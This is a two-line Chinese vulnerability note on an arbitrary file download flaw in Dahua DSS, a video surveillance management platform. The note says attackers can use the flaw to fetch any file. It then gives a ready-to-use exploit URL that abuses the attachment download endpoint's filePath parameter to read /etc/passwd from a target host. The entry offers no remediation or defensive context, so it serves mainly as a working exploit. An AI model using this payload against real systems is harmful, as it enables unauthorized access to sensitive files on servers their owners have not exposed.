浙江大華技術股份有限公司DSS存在任意文件下載漏洞,攻擊者可利用該漏洞登錄界面下載任意文件獲取敏感信息。
http://ip/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
